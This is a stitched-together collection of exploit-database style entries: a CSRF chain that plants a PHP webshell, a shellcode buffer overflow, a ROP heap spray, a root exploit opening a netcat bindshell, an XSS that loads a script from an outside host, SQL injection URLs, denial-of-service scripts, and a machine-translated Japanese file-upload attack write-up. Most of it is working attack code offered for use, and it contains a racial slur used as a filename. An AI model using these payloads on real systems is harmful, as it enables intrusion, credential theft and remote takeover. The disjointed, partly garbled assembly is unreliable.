name="initialERDCId" value="20" /> <input type="hidden" name="target" value="1" /> <input type="hidden" name="targetType" value="systemList" /> <input type="hidden" name="systemList" value="1" /> <input type="hidden" name="serviceGroupList" value="&#45;10" /> <input type="hidden" name="initialMode" value="standard" /> <input type="hidden" name="erdcName" value="Exploit" /> <input type="hidden" name="erdcInitialName" value="" /> <input type="hidden" name="erdcDescription" value="Exploit" /> <input type="hidden" name="hostButton" value="system" /> <input type="hidden" name="erdc&#95;id" value="20" /> <input type="hidden" name="forceReload" value="0" /> <input type="hidden" name="operation" value="standard" /> <input type="hidden" name="erdc&#95;instance&#95;id" value="" /> <input type="hidden" name="label&#95;&#91;184&#93;" value="Script&#32;Name" /> <input type="hidden" name="value&#95;&#91;184&#93;" value="c&#58;&#92;windows&#92;system32&#92;cmd&#46;exe" /> <input type="hidden" name="id&#95;&#91;184&#93;" value="process" /> <input type="hidden" name="name&#95;&#91;process&#93;" value="184" /> <input type="hidden" name="units&#95;&#91;184&#93;" value="" /> <input type="hidden" name="guiBasic&#95;&#91;184&#93;" value="1" /> <input type="hidden" name="inputType&#95;&#91;184&#93;" value="GUIString" /> <input type="hidden" name="screenOrder&#95;&#91;184&#93;" value="1" /> <input type="hidden" name="parmType&#95;&#91;184&#93;" value="1" /> <input type="hidden" name="label&#95;&#91;185&#93;" value="Arguments" /> <input type="hidden" name="value&#95;&#91;185&#93;" value="&#32;&#47;C&#32;ren&#32;"C&#58;&#92;Program&#32;Files&#92;uptime&#32;software&#92;uptime&#92;GUI&#92;wizards&#92;nigga&#46;txt"&#32;"nigga&#46;php"&#32;" /> <input type="hidden" name="id&#95;&#91;185&#93;" value="args" /> <input type="hidden" name="name&#95;&#91;args&#93;" value="185" /> <input type="hidden" name="units&#95;&#91;185&#93;" value="" /> <input type="hidden" name="guiBasic&#95;&#91;185&#93;" value="1" /> <input type="hidden" name="inputType&#95;&#91;185&#93;" value="GUIString" /> <input type="hidden" name="screenOrder&#95;&#91;185&#93;" value="2" /> <input type="hidden" name="parmType&#95;&#91;185&#93;" value="1" /> <input type="hidden" name="label&#95;&#91;187&#93;" value="Output" /> <input type="hidden" name="can&#95;retain&#95;&#91;187&#93;" value="false" /> <input type="hidden" name="comparisonWarn&#95;&#91;187&#93;" value="&#45;1" /> <input type="hidden" name="comparison&#95;&#91;187&#93;" value="&#45;1" /> <input type="hidden" name="id&#95;&#91;187&#93;" value="value&#95;critical&#95;output" /> <input type="hidden" name="name&#95;&#91;output&#93;" value="187" /> <input type="hidden" name="units&#95;&#91;187&#93;" value="" /> <input type="hidden" name="guiBasic&#95;&#91;187&#93;" value="1" /> <input type="hidden" name="inputType&#95;&#91;187&#93;" value="GUIString" /> <input type="hidden" name="screenOrder&#95;&#91;187&#93;" value="4" /> <input type="hidden" name="parmType&#95;&#91;187&#93;" value="2" /> <input type="hidden" name="label&#95;&#91;189&#93;" value="Response&#32;time" /> <input type="hidden" name="can&#95;retain&#95;&#91;189&#93;" value="false" /> <input type="hidden" name="comparisonWarn&#95;&#91;189&#93;" value="&#45;1" /> <input type="hidden" name="comparison&#95;&#91;189&#93;" value="&#45;1" /> <input type="hidden" name="id&#95;&#91;189&#93;" value="value&#95;critical&#95;timer" /> <input type="hidden" name="name&#95;&#91;timer&#93;" value="189" /> <input type="hidden" name="units&#95;&#91;189&#93;" value="ms" /> <input type="hidden" name="guiBasic&#95;&#91;189&#93;" value="0" /> <input type="hidden" name="inputType&#95;&#91;189&#93;" value="GUIInteger" /> <input type="hidden" name="screenOrder&#95;&#91;189&#93;" value="6" /> <input type="hidden" name="parmType&#95;&#91;189&#93;" value="2" /> <input type="hidden" name="timing&#95;&#91;erdc&#95;instance&#95;monitored&#93;" value="1" /> <input type="hidden" name="timing&#95;&#91;timeout&#93;" value="60" /> <input type="hidden" name="timing&#95;&#91;check&#95;interval&#93;" value="10" /> <input type="hidden" name="timing&#95;&#91;recheck&#95;interval&#93;" value="1" /> <input type="hidden" name="timing&#95;&#91;max&#95;rechecks&#93;" value="3" /> <input type="hidden" name="alerting&#95;&#91;notification&#93;" value="1" /> <input type="hidden" name="alerting&#95;&#91;alert&#95;interval&#93;" value="120" /> <input type="hidden" name="alerting&#95;&#91;alert&#95;on&#95;critical&#93;" value="1" /> <input type="hidden" name="alerting&#95;&#91;alert&#95;on&#95;warning&#93;" value="1" /> <input type="hidden" name="alerting&#95;&#91;alert&#95;on&#95;recovery&#93;" value="1" /> <input type="hidden" name="alerting&#95;&#91;alert&#95;on&#95;unknown&#93;" value="1" /> <input type="hidden" name="time&#95;period&#95;id" value="1" /> <input type="hidden" name="pageFinish" value="Finish" /> <input type="hidden" name="pageContinue" value="Continue&#46;&#46;&#46;" /> <input type="hidden" name="isWizard" value="1" /> <input type="hidden" name="wizardPage" value="2" /> <input type="hidden" name="wizardNumPages" value="2" /> <input type="hidden" name="wizardTask" value="pageFinish" /> <input type="hidden" name="visitedPage&#91;1&#93;" value="1" /> <input type="hidden" name="visitedPage&#91;2&#93;" value="1" /> </form> <!-- Uploading php shell txt format --> <form name="uploadshell" action="http://127.0.0.1:9999/wizards/post2file.php" method="POST" target="frame5"> <input type="hidden" name="file&#95;name" value="nigga&#46;txt" /> <input type="hidden" name="script" value="<&#63;&#32;passthru&#40;&#36;&#95;GET&#91;&apos;cmd&apos;&#93;&#41;&#59;&#32;&#63;>" /> </form> <!-- Run command to rename php shell --> <form name="run" action="http://127.0.0.1:9999/main.php" method="POST" target="frame6"> <input type="hidden" name="section" value="RunERDCInstance" /> <input type="hidden" name="subsection" value="view" /> <input type="hidden" name="id" value="65535" /> <input type="hidden" name="name" value="Exploit" /> </form> <!-- Executing basic command --> <form name="exploit" action="http://127.0.0.1:9999/wizards/nigga.php" METHOD="GET" target="frame7"> <input type="hidden" name="cmd" value="whoami" /> </form> <iframe name="frame0"></iframe> <iframe name="frame1"></iframe> <iframe name="frame2"></iframe> <iframe name="frame3"></iframe> <iframe name="frame4"></iframe> <iframe name="frame5"></iframe> <iframe name="frame6"></iframe> <iframe name="frame7"></iframe> <script> function runme() { document.login.submit(); document.getElementsByTagName("iframe")[0].onload = function() //document.write("Login....") { document.privadm.submit(); document.getElementsByTagName("iframe")[1].onload = function() //document.write("Mutating to admin uahsuasuas"); { document.logoff.submit(); document.getElementsByTagName("iframe")[2].onload = function() //document.write("Refreshing perms..."); { document.login2.submit(); document.getElementsByTagName("iframe")[3].onload = function() //document.write("Login again...Keep Calm...."); { document.createmonitor.submit(); document.getElementsByTagName("iframe")[4].onload = function() //document.write("Creating F*cking monitor"); { document.uploadshell.submit(); document.getElementsByTagName("iframe")[5].onload = function() //document.write("Uploading webshell. Muaaaaa! Muaaaaa!!"); { document.run.submit(); document.getElementsByTagName("iframe")[6].onload = function() //document.write("Trick to shell... come on...."); { document.exploit.submit(); document.getElementsByTagName("iframe")[7].onload = function() alert('Pwned!!!!!!!!!!!!!!!!!!!!!!') } } } } } } } } </script> </body> </html>

#!/usr/bin/python #Exploit Title:ChiefPDF Software Buffer Overflow #vulnerable programs: #PDF to Image Converter 2.0 #PDF to Image Converter Free 2.0 #PDF to Tiff Converter 2.0 #PDF to Tiff Converter Free 2.0 #Software Link:http://www.soft32.com/publishers/chiefpdf/ #Author: metacom - twitter.com/m3tac0m #Tested on: Win-Xp-sp3, Win-7, Win-8.1 #How to use:Copy the AAAA...string from regkey.txt and paste->Registration - License Name: buffer="A" * 544 buffer+="\xeb\x06\x90\x90" buffer+="\x8B\x89\x03\x10"# 1003898B 5E POP ESI buffer+="\x90" * 80 buffer+=("\xba\x50\x3e\xf5\xa5\xda\xd7\xd9\x74\x24\xf4\x5b\x31\xc9\xb1" "\x33\x83\xc3\x04\x31\x53\x0e\x03\x03\x30\x17\x50\x5f\xa4\x5e" "\x9b\x9f\x35\x01\x15\x7a\x04\x13\x41\x0f\x35\xa3\x01\x5d\xb6" "\x48\x47\x75\x4d\x3c\x40\x7a\xe6\x8b\xb6\xb5\xf7\x3d\x77\x19" "\x3b\x5f\x0b\x63\x68\xbf\x32\xac\x7d\xbe\x73\xd0\x8e\x92\x2c" "\x9f\x3d\x03\x58\xdd\xfd\x22\x8e\x6a\xbd\x5c\xab\xac\x4a\xd7" "\xb2\xfc\xe3\x6c\xfc\xe4\x88\x2b\xdd\x15\x5c\x28\x21\x5c\xe9" "\x9b\xd1\x5f\x3b\xd2\x1a\x6e\x03\xb9\x24\x5f\x8e\xc3\x61\x67" "\x71\xb6\x99\x94\x0c\xc1\x59\xe7\xca\x44\x7c\x4f\x98\xff\xa4" "\x6e\x4d\x99\x2f\x7c\x3a\xed\x68\x60\xbd\x22\x03\x9c\x36\xc5" "\xc4\x15\x0c\xe2\xc0\x7e\xd6\x8b\x51\xda\xb9\xb4\x82\x82\x66" "\x11\xc8\x20\x72\x23\x93\x2e\x85\xa1\xa9\x17\x85\xb9\xb1\x37" "\xee\x88\x3a\xd8\x69\x15\xe9\x9d\x86\x5f\xb0\xb7\x0e\x06\x20" "\x8a\x52\xb9\x9e\xc8\x6a\x3a\x2b\xb0\x88\x22\x5e\xb5\xd5\xe4" "\xb2\xc7\x46\x81\xb4\x74\x66\x80\xd6\x1b\xf4\x48\x37\xbe\x7c" "\xea\x47") file = open('regkey.txt','wb') file.write(buffer); file.close()

.__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ http://h4x0resec.blogspot.com / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ Vifi Radio v1 - CSRF (Arbitrary Change Password) Exploit ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Discovered by: KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com / http://milw00rm.com [~] Greetz: BARCOD3, ZoRLu, b3mb4m, _UnDeRTaKeR_, DaiMon, VoLqaN, EthicalHacker, Oguz Dokumaci ( d4rkvisuaL ) Septemb0x, KedAns-Dz, indushka, Kalashinkov ############################################################ ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Vifi Radio |~Affected Version : v1 |~Software : http://scriptim.org/market-item/vifi-v1-radyo-scripti/ & http://vifibilisim.com/scriptlerimiz-29-Radyo_Siteleri_Icin_Script.html |~Official Demo : http://radyo.vifibilisim.com |~RISK : Medium |~DORK : inurl:index.asp?radyo=2 |~Tested On : [L] Windows 7, Mozilla Firefox ######################################################## ---------------------------------------------------------- PoC ---------------------------------------------------------- <html> <body> <form action="http://[TARGET]/yonetim/kullanici-kaydet.asp?tur=g" method="POST"> <input type="hidden" name="rutbe" value="1" /> <input type="hidden" name="djadi" value="0" /> <input type="hidden" name="resim" value="Vifi+Bili%FEim" /> <input type="hidden" name="firma" value="USERNAME" /> <input type="hidden" name="link" value="PASSWORD" /> <input type="hidden" name="sira" value="23" /> <input type="hidden" name="ilet" value="G%D6NDER" /> <input type="hidden" name="Submit" value="Exploit!" /> <input type="submit" value="Submit request" /> </form> </body> </html> ############################ "Admin Panel: /yonetim " ############################

# Title: Aruba Mobility Controller CSRF And XSS Vulnerabilities # Date: 08/016/2015 # Author: Itzik Chen # Product web page: http://www.arubanetworks.com # Affected Version: 6.4.2.8 # Tested on: Aruba7240, Ver 6.2.4.8 Summary ================ Aruba Networks is an HP company, one of the leaders in enterprise Wi-Fi. Arube Controller suffers from CSRF and XSS vulnerabilities. Proof of Concept - CSRF ========================= 192.168.0.1 - Controller IP-Address 172.17.0.1 - Remote TFTP server <IMG width=1 height=1 SRC="https://192.168.0.1:4343/screens/cmnutil/copyLocalFileToTftpServerWeb.xml?flashbackup.tar.gz,172.17.0.1,flashbackup.tar.gz"> That will send the flashbackup configuration file to a remote TFTP server. Proof of Concept - XSS ========================= https://192.168.0.1:4343/screens/switch/switch_mon.html?mode=plog-custom&mode-title=test</td><img width=1 height=1 src=/images/logo-mobility-controller.gif onLOAD=alert(document.cookie)>

""" ******************************************************************************************** # Exploit Title: Valhala Honeypot Stack based BOF(Remote DOS) # Date: 8/20/2015 # Exploit Author: Un_N0n # Software Developer: Marcos Flavio Araujo Assuncao # Software Link: http://sourceforge.net/projects/valhalahoneypot/ # Version: 1.8 # Tested on: Windows 7 x86(32 BIT) ******************************************************************************************** [Steps to Produce the Crash]: 1- Open 'honeypot.exe'. 2- Enter the IP of the machine on which this honeypot is running, in this case it is your own machine i.e 127.0.0.1. 3- Run the script. ~ Software crashes. [Code to crash honeypot]: ============================================================== """ import socket while True: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("IP_ADDR",21)) s.send('USER test\r\n') s.send('PASS test\r\n') s.send('ABOR '+'A'*2000+'\r\n') s.recv(1024) s.send('ABOR '+'A'*5000+'\r\n') s.recv(1024) s.send('ABOR '+'A'*6000+'\r\n') s.recv(1024) s.send('QUIT\r\n') s.close() ============================================================== **********************************************************************************************

<!-- # Exploit Title: Pligg CMS Arbitrary Code Execution # Google Dork: intext:"Made wtih Pligg CMS" # Date: 2015/8/20 # Exploit Author: Arash Khazaei # Vendor Homepage: http://pligg.com # Software Link: https://github.com/Pligg/pligg-cms/releases/download/2.0.2/2.0.2.zip # Version: 2.0.2 # Tested on: Kali , Iceweasel Browser # CVE : N/A # Contact : http://twitter.com/0xClay # Mail : 0xclay@gmail.com # Site : http://bhunter.ir # Description : # Pligg CMS Is A CMS Writed In PHP Language And Licensed Under GPL V 2.0 # In Pligg CMS Panel In Adding Page Section Pligg CMS Allow To Admin Add PHP Codes In {php} {/php} Tags # A CSRF Vulnerabilty In Adding Page Section Allow To Attacker To Execute PHP Codes On Server . # In This Exploit I Just Added a echo '<h1> Hacked </h1>'; Code You Can Customize Exploit For Your Self . # Exploit : --> <html> <body onload="document.exploit.submit();"> <form action="http://localhost/pligg-cms/admin/submit_page.php" method="POST" id="thisform" name="exploit"> <input type="hidden" name="page_title" id="page_title" size="66"value="Hacked"/> <input type="hidden" name="page_url" id="page_url" size="66" value="Hacked"/> <input type="hidden" name="page_keywords" id="page_keywords" size="66" value="Hacked"/> <input type="hidden" name="page_description" id="page_description" size="66" value="Hacked"/> <textarea type="hidden"id="textarea-1" name="page_content" class="form-control page_content" rows="15"> {php}echo '<h1> Hacked </h1>'; {/php} &lt;/textarea&gt; <input type="hidden" name="process" value="new_page" /> <input type="hidden" name="randkey" value="12412532" /> </form> </body> </html> <!-- # After HTML File Executed You Can Access Page In http://localhost/pligg-cms/page.php?page=Hacked # Discovered By Arash Khazaei . (Aka JunkyBoy (Nick Name Changed :P )) -->

source: https://www.securityfocus.com/bid/55709/info The Midori Browser is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Midori Browser 0.3.2 is vulnerable; other versions may also be affected. it**************************** <html> <!-- ROP completed---> <head> <Title>Ubuntu 11.10 Calc p47l0d -- Rop Completed</title> <script type="text/javascript"> function ignite() { var carpet = 0x200; var vftable = unescape("\x00% u0c10"); var pLand = "% u00fd% u0c10"; var pShell = "% u0000% u0c10"; var oldProt = "% u0000% u0c10"; var heap = unescape("% u0101% u0102" +"% u0008% u0c10" +"% u0105% u0106" +"% u10c2% u7c34"//"% u0107% u0108" pop ecx;pop ecx;ret +"% u0109% u010a"// +"% u3134% u6d32"//"% u010b% u010c"//"% u6643% u6d6a" // mov eax,[esi] +"% u787f% u6d32"//"% u010d% u010e"// xchg eax,esi;aam 0ff;dec ecx;ret +"% u7b72% u6d83"//"% u010f% u0111" // pop edx;ret +"% u0000% u0c10"//% u0112% u0113" // will be popped in edx // +"% u2a30% u6d7f"//"% u0114% u0115" // mov ecx,esi;call [edx+50] +pLand//"% u0116% u0117" // Address in shellcode to land change it accordingly +"% ue8d4% u6d7f"//"% u0118% u0119" // mov [ecx],eax;pop ebp;ret +"% u011a% u011b"// will be popped in ebp +"% u1b02% u7c34"//"% u011c% u011d" // dec ecx;ret +"% u1b02% u7c34"//"% u011e% u011f" // dec ecx;ret +"% u1b02% u7c34"//"% u0120% u0121" // dec ecx;ret +"% u1b02% u7c34"//"% u0122% u0123" // dec ecx;ret +"% u4edc% u7c34"//"% u0122% u0123" // pop eax;ret +oldProt//"% u0124% u0125" // pOldProtection +"% ue8d4% u6d7f"//"% u0126% u0127" // mov [ecx],eax;pop ebp;ret +"% u4edb% u7c34"//"% u0128% u0129" // pop ebx;pop eax;ret // needed in initial phase. +"% u1b02% u7c34"//"% u012a% u012b" // dec ecx;ret +"% u1b02% u7c34"//"% u012c% u012d" // dec ecx;ret +"% u4edb% u7c34"//"% u012e% u012f" // pop ebx;pop eax;ret +"% u2643% u7c34"//"% u0130% u0131" // xchg eax,esp;pop edi;add byte ptr ds:[eax],al;pop ecx,ret +"% u0040% u0000"//"% u0132% u0133" // newProptection = PAGE_READ_WRITE_EXECUTE +"% u1b02% u7c34"//"% u0134% u0135" // dec ecx;ret +"% u1b02% u7c34"//"% u0136% u0137" // dec ecx;ret +"% ue8d4% u6d7f"//"% u0138% u0139" // mov [ecx],eax;pop ebp;ret +"% u013a% u013b"// will be popped in ebp +"% u1b02% u7c34"//"% u013c% u013d" // dec ecx;ret +"% u1b02% u7c34"//"% u013e% u013f" // dec ecx;ret +"% u1b02% u7c34"//"% u0140% u0141" // dec ecx;ret +"% u1b02% u7c34"//"% u0142% u0143" // dec ecx;ret +"% u4edc% u7c34"//"% u0144% u0145" // pop eax;ret +"% u0000% u0010"//"% u0146% u0147" // Size +"% ue8d4% u6d7f"//"% u0148% u0149" // mov [ecx],eax;pop ebp;ret +"% u014a% u014b"// Will be popped in ebp. +"% u1b02% u7c34"//"% u014c% u014d" // dec ecx;ret +"% u1b02% u7c34"//"% u014e% u014f" // dec ecx;ret +"% u1b02% u7c34"//"% u0150% u0151" // dec ecx;ret +"% u1b02% u7c34"//"% u0152% u0153" // dec ecx;ret +"% u4edc% u7c34"//"% u0144% u0145" // pop eax;ret +pShell//"% u0146% u0147" // Address Of Shellcode block to change protection. +"% ue8d4% u6d7f"//"% u0148% u0149" // mov [ecx],eax;pop ebp;ret +"% u014a% u014b"// Will be popped in ebp. /* +"% u1b02% u7c34"//"% u014c% u014d" // dec ecx;ret +"% u1b02% u7c34"//"% u014e% u014f" // dec ecx;ret +"% u1b02% u7c34"//"% u0150% u0151" // dec ecx;ret +"% u1b02% u7c34"//"% u0152% u0153" // dec ecx;ret */ +"% u4cc1% u7c34"//"% u0154% u0155" // pop eax;ret +"% u9611% u7c34"//"% u0156% u0157" // will be popped in eax. pop edi;pop ebx;pop ebp;ret +"% u347a% u7c34"//"% u0158% u0159" // push esi;push edi;call eax +"% u4edc% u7c34"//"% u015a% u015b" // pop eax;ret +"% u00e0% u0c10"//"% u015c% u015d" // will be popped in eax. /* Need to fix the ebp for proper landing on shellcode */ +"% uc420% u6d99"// dec ebp;ret +"% uc420% u6d99"// dec ebp;ret +"% uc420% u6d99"// dec ebp;ret +"% uc420% u6d99"// dec ebp;ret +"% u1f0a% u7c34"//"% u015e% u015f" // mov esp,ecx;mov ecx[eax];mov eax,[eax+4];push eax;ret +"% u0160% u0161" +"% u28dd% u7c35"//"% u0162% u0163" // VirtualProtect +"% u0164% u0165" +"% u0166% u0167" +"% u0168% u0169" +"% u016a% u016b" +"% u016c% u016d" ) /* Shellcode : */ +unescape("% u9090% u9090% u9090% u9090" +"% u585b" // pop ebx;pop eax; +"% u0a05% u0a13% u9000" // add eax,0a130a +"% u008b" // mov eax,[eax] +"% u056a" // push 05 +"% uc581% u0128% u0000" // add ebp,114 +"% u9055" // push ebp;nop +"% u1505% u04d6% u9000" // add eax,4d615 +"% ud0ff" // call eax +"% uBBBB% uCCCC% uDDDD% uEEEE" /* command: */ +"% u6163% u636c% u652e% u6578% u0000% ucccc" // calc.exe ); var vtable = unescape("\x04% u0c10"); while(vtable.length < 0x10000) {vtable += vtable;} var heapblock = heap+vtable.substring(0,0x10000/2-heap.length*2); while (heapblock.length<0x80000) {heapblock += heap+heapblock;} var finalspray = heapblock.substring(0,0x80000 - heap.length - 0x24/2 - 0x4/2 - 0x2/2); var spray = new Array(); for (var iter=0;iter<carpet;iter++){ spray[iter] = finalspray+heap; } /* vulnerability trigger : */ var arrobject = [0x444444444444]; for(;true;){(arrobject[0])++;} } </script> </head> <body> <applet src="test.class" width=10 height=10></applet> <input type=button value="Object++" onclick="ignite()" /> </body> </html> ********************Exploit****************************

source: https://www.securityfocus.com/bid/55689/info The ABC Test plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. ABC Test 0.1 is vulnerable; other versions may also be affected. http://www.example.com/blog/wp-admin/admin.php?page=abctest&do=edit&id=%22%3E%3Ch1 %3EXSS%3C/h1

source: https://www.securityfocus.com/bid/55725/info Reaver Pro is prone to a local privilege-escalation vulnerability. A local attacker may exploit this issue to execute arbitrary code with root privileges. Successful exploits may result in the complete compromise of affected computers. #!/usr/bin/env python import os print """ Reaver Pro Local Root Exploits a hilarious named pipe flaw. The named pipe /tmp/exe is open to anyone... Any command echoed into it gets ran as root. This simply launches a bindshell on 4444... Insecurety Research | insecurety.net """ print "" print "This is why TacNetSol should hire me?" print "[+] Sending command to named pipe..." cmd = '''echo "nc -e /bin/sh -lvvp 4444" >> /tmp/exe''' os.system(cmd) print "[+] Connecting to bind shell, enjoy root!" os.system("nc -v localhost 4444")

0x01サイト1：ファイルアップロード ソースコードリーク スパイシーチキンの長い愛する辞書を開き、スキャンして、bin.zip情報リークがあることを見つけ、コード監査を実行してみてください ファイルの場所：SimpleDataplatform.simpledataplatform.fileupload リクエストを受信するためにProcessRequestを見つけます。パラメーターの束を取得した後（初期化）、ハンドルファイルメソッドを入力することがわかります。 処理のためにハンドルファイルをフォローアップします。 DateType=ZbJHSBの場合、リクエストは処理されます。 DateTypeはGETパラメーターです。 パスは/uploads/setdata/zbjhsbで、str名はタイムスタンプ、str2（接尾辞）は制限なしに保存されます。 OK、これは任意のファイルの完全なアップロードである必要があります。返品値がある限り、サイトはなくなります。しかし、残念ながら、彼は価値を返しませんでした。 メソッドはfileuploadであるため、ファイル名は推測します fileupload.aspx fileupload.ashx fileupload.asmx fileuploads.aspx fileuploads.asmx fileuploads.ashx アップロード.およびその他の既存の辞書が破裂し、ファイル名http://xxx.com:6039/fileuploads.ashxを正常に見つけました アップロードフォームを直接構築します。ここのフォームの名前フィールドを設定しないでください（コードにはありません）。パッケージを送信した後、200を返します。アップロードされたのかもしれませんよね？ post /fileuploads.ashx？datatype=zbjhsb http /1.1 host: xxx.cn:6039 Content-Length: 195 user-agent: mozilla/5.0（windows nt 10.0; win64; x64）applewebkit/537.36（khtml、geckoのような）chrome/93.0.4577.82 safari/537.36 X-Requested With: xmlhttprequest Content-Type: MultiPart/Form-Data;境界=--- webkitformboundarysvkajfiouerxhsu8 Accept: */* Connection:閉じます ----- webkitformboundarysvkajfiouerxhsu8 content-disposition: form-data; name='file'; filename='1.aspx' Content-Type: Image/JPEG 1111111111111 ----- webkitformboundarysvkajfiouerxhsu8-- 使用された形式がファイル名としてyyyymmdhhmmmssfffであることを前に見た後、extixを直接傍受しました。特定のパスがあるため、サイトを取得するにはタイムスタンプファイル名を破裂させるだけが必要です。これを行ったことがないので、試してみることもできます。 爆発タイムスタンプ PowerShellを使用してタイムスタンプを生成し、プレスGOにげっぷでリクエストパケットを送信する PowerShell -C get -date -format yyyymmddhhmmssfff 次の5桁、つまりssffff（コンピューター上の時間が必ずしも正確ではないため、6桁も爆破されることがあります） どれくらい待っているのかわかりません 私はとても幸運です、私は次のことについてあまり言いません。 0x02サイト2：ファイルアップロード アップロードインターフェイスを見つけます Webサイトhttp://XXXX:880/ZWWPT/＃/を開き、閉じていないWebPackDebugモードがあることを見つけます。 JSをチェックして、アップロードインターフェイスを見つけます http://

source: https://www.securityfocus.com/bid/55739/info Switchvox is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. Switchvox 5.1.2 vulnerable; other versions may also be affected. Review: Tools -> Sound Manager -> Create sound [Description] PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe> Review: Tools -> SugarCRM switchboard Panel -> setup [SugarCRM Web URL] [SugarCRM SOAP URL] PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe> Review: Setup -> Groups -> Create Extension Group [Note] PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe> Review: Setup -> Outgoing calls -> Create Outgoing Call rule [Note] PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe> Review: Setup -> Incoming Calls -> Caller DID routes -> Create Single DID Route [Note] PoC:<iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe> Review: Setup -> Incoming Calls -> Caller ID Rules -> Create Call transfer Call [Note] PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>

source: https://www.securityfocus.com/bid/55740/info IBM Lotus Notes Traveler is prone to a URI-redirection vulnerability, multiple HTML-injection vulnerabilities and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user and conduct phishing attacks. Other attacks are also possible. IBM Lotus Notes Traveler 8.5.3 and prior are vulnerable; other versions may also be affected. http://www.example.com/servlet/traveler?deviceType=700&redirectURL=javascript:alert(document.cookie) http://www.example.com/servlet/traveler?deviceType=700&redirectURL=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B http://www.example.com/servlet/traveler?deviceType=700&redirectURL=http://websecurity.com.ua

source: https://www.securityfocus.com/bid/55755/info Zenphoto is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Zenphoto 1.4.3.2 is vulnerable; prior versions may also be affected. http://www.example.com/zp-core/zp-extensions/zenpage/admin-news-articles.php?date=%22%3E%3Cscript%3Ealert%28%27Cookie%20sealing%20Javascript%27%29;%3C/script%3E%3C>

source: https://www.securityfocus.com/bid/55746/info AlamFifa CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. AlamFifa CMS 1.0 Beta is vulnerable; other versions may also be affected. user_name_cookie=test' LIMIT 0,1 UNION ALL SELECT 93,93,CONCAT(0x3a6b63733a,0x50766e44664451645753,0x3a6165683a),93,93,93#;

source: https://www.securityfocus.com/bid/55749/info The Akismet plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. #!/usr/bin/php -f <?php # # legacy.php curl exploit # // // HTTP POST, // $target = $argv[1]; $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_URL, "http://$target/wp-content/plugins/akismet/legacy.php"); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "s=%2522%253E%253Cscript%2520src%253d%2F%2Fsantanafest.com.br%2Fenquete%2Fc%253E%253C%2Fscript%253E"); curl_setopt($ch, CURLOPT_TIMEOUT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?>

source: https://www.securityfocus.com/bid/55760/info Omnistar Mailer is prone to multiple SQL-injection vulnerabilities and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, execute HTML and script code in the context of the affected site, and steal cookie-based authentication credentials; other attacks are also possible. Omnistar Mailer 7.2 is vulnerable; other versions may also be affected. http://www.example.com/mailertest/admin/responder.php?op=edit&id=-37'+Union+Select+version(),2,3--%20-#[SQLi] http://www.example.com/mailer/admin/preview.php?id=-2'+union+Select+1--%20-[SQLi] http://www.example.com/mailer/admin/pages.php?form_id=-2'+Union+Select+version(),2,3--%20-#%20-&op=list[SQLi] http://www.example.com/mailer/admin/navlinks.php?op=edit&nav_id=9''+Union+Select+version(),2,3--%20-#[SQLi] http://www.example.com/mailertest/users/register.php?nav_id=-18'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20-[SQLi] http://www.example.com/mailertest/admin/pages.php?op=edit&id=16&form_id=2&apos;[SQLi] http://www.example.com/mailertest/admin/contacts.php?op=edit&id=3&form_id=2&apos;[SQLi] http://www.example.com/mailertest/users/index.php?profile=1&form_id=2&apos;[SQLi] 